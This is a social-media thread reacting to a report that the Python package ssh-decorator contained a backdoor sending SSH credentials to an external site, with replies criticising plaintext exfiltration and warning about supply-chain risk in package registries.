always coming home is a user on You can follow them or interact with them if you have an account anywhere in the fediverse. If you don't, you can sign up here.
always coming home @nightpool

holy shit.

"The ssh-decorator package from Python pip had an obvious backdoor"

sends host + username + password to an external website

· Web · 115 · 53

@nightpool now imagine if it were proprietary.

@SoniEx2 most people don't use proprietary libraries

@nightpool that's not just a backdoor, that's blatant exfiltration. (Over HTTP, which is a crime of its own.)

@alfajet which is completely pointless, given that dot cf never provides any personal details........

@nightpool Chapter four billion, seven hundred thirty-eight thousand, nine hundred twenty-four in why you shouldn't blindly install stuff from a package system anyone can upload to.

@nightpool Or even with your eyes open, since at any time a package could change hands.

@nightpool @codl holy shit IN PLAINTEXT even what the jesus everfucking shit

@fluffy @nightpool @codl And if it weren't bad enough: logging it as 'passowrd'.

@Austin_Dern @nightpool @codl I can actually see them having done that on purpose to fool automated warning/checker things. It’s an anti pattern I saw a few times at Amazon internally to escape a code auditor process.

@fluffy @nightpool @codl Surely is to sneak past automated checking, yes. It's the laziness that gets me. If they titled like, 'networkSuccess' or 'connectStatus' or even 'misc1' then you'd have something too boring to pay attention to if you caught it being passed on your network.

@nightpool which also reminds me that each npm package I install, each shady library I git clone and build is executing arbitrary code in my self-signed-certificate-secure-boot-and-full-disk-encryption-TPM-enabled-machine

paranoid mode (re)activated, I'll probably be installing "CleanMyPC" in like four days or so

@nightpool they could have at least obfuscated it or something

@nightpool It's almost like that practice of basically forcing people to put plaintext passwords in ~/.pypirc and never checking signagures wasn't the best idea :/

@nightpool So Twitter uses a Python backend? 😂